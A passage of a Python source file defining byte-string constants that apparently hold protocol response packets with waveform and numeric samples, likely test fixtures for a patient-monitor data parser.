b"\x1f\xf6\x1f\xf5\x1f\xf6\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6\x1f\xf6\x1f\xf6\x1f\xf7\x1f\xf5" \ b"\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf9\x1f\xfa\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xfa\x1f\xfb\x1f\xfc" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfe" \ b"\x1f\xff\x20\x00\x1f\xff\x1f\xff\x20\x00\x20\x00\x1f\xff\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xed\x1f\xeb\x1f\xeb" \ b"\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf" \ b"\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xdd" \ b"\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe5\x1f\xe5\x1f\xe7\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xeb" \ b"\x1f\xed\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf7\x1f\xf7\x1f\xf9\x1f\xfb\x1f\xfd" \ b"\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb" \ b"\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66" \ b"\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91" \ 
b"\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05" \ b"\x04\x01\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_8_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x68\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_8_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x70\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 
b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\xa0\x84\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x00\x20\x02" \ b"\x20\x04\x20\x08\x20\x08\x20\x0b\x20\x10\x20\x12\x20\x15\x20\x17" \ b"\x20\x1a\x20\x1c\x20\x1f\x20\x22\x20\x25\x20\x27\x20\x2a\x20\x2d" \ b"\x20\x30\x20\x33\x20\x33\x20\x32\x20\x30\x20\x2f\x20\x2a\x20\x28" \ b"\x20\x24\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x04\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x03\x20\x09" \ b"\x20\x0f\x20\x13\x20\x1d\x20\x23\x20\x27\x20\x2f\x20\x35\x20\x3d" \ b"\x20\x43\x20\x4b\x20\x51\x20\x57\x20\x5d\x20\x65\x20\x6b\x20\x71" \ 
b"\x20\x77\x20\x79\x20\x77\x20\x73\x20\x6d\x20\x65\x20\x61\x20\x59" \ b"\x20\x53\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_8_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x78\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef\x1f\xed\x1f\xed\x1f\xec\x1f\xeb" \ 
b"\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3" \ b"\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb" \ b"\x1f\xda\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9" \ b"\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7" \ b"\x1f\xf6\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ 
b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb" \ b"\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3" \ b"\x1f\xe3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_9_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ 
